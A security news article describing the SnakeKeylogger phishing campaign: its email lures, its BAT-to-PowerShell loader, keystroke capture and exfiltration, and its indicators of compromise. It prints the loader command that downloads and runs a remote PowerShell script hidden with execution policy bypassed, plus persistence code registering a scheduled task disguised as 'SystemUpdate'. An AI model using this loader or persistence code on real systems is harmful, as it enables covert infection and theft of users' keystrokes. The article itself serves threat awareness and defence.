SnakeKeylogger via Weaponized E-mails Leverage PowerShell to Exfiltrate Sensitive Data

Emerging from a recent wave of targeted campaigns, SnakeKeylogger has surfaced as a potent infostealer that capitalizes on PowerShell and social engineering.

The malware’s operators craft convincing spear-phishing e-mails under aliases such as “CPA-Payment Files,” impersonating reputable financial and research firms.

Recipients encounter ISO or ZIP attachments containing a seemingly innocuous BAT script. Once executed, this script downloads and launches a PowerShell payload designed to harvest keystrokes and system information before exfiltrating data to a remote server.

Gen Threat Labs analysts noted the malware’s seamless blend of legitimate Windows utilities and custom scripting for stealth and rapid deployment.

After opening the attachment, victims unwittingly activate a BAT file resembling the following snippet:

@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1'}"

This approach bypasses standard execution policies and conceals visible windows, allowing SnakeKeylogger to operate without raising suspicion.

The PowerShell script, once loaded, establishes persistence by creating scheduled tasks and registry entries, ensuring the malware survives reboots and avoids cursory incident response efforts.

Beyond initial delivery, SnakeKeylogger’s impact lies in its minimalist but efficient data collection routines. Upon activation, the script invokes Windows API functions to capture keystrokes, clipboard contents, and active window titles.

Collected information is batched and encoded before transmission to a command-and-control server.

Observed IoCs include BAT payload SHA256 hashes such as 3796e68... and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, indicative of the ongoing campaign.

Infection Mechanism

SnakeKeylogger’s infection chain hinges on its two-stage loader. The initial BAT script exploits PowerShell’s unrestricted execution to retrieve the core keylogger module.

Within the PowerShell payload, the Add-Type cmdlet compiles C# code on the fly, injecting functions such as GetAsyncKeyState for low-level keystroke interception.

Persistence is achieved via a scheduled task entry resembling:-

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1'
Register-ScheduledTask -TaskName 'SystemUpdate' -Action $Action -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest

This tactic not only reinstates the keylogger at each user login but also blends into legitimate Windows maintenance processes, complicating detection. Continuous monitoring and timely updates to endpoint protection policies are recommended to counteract this evolving threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.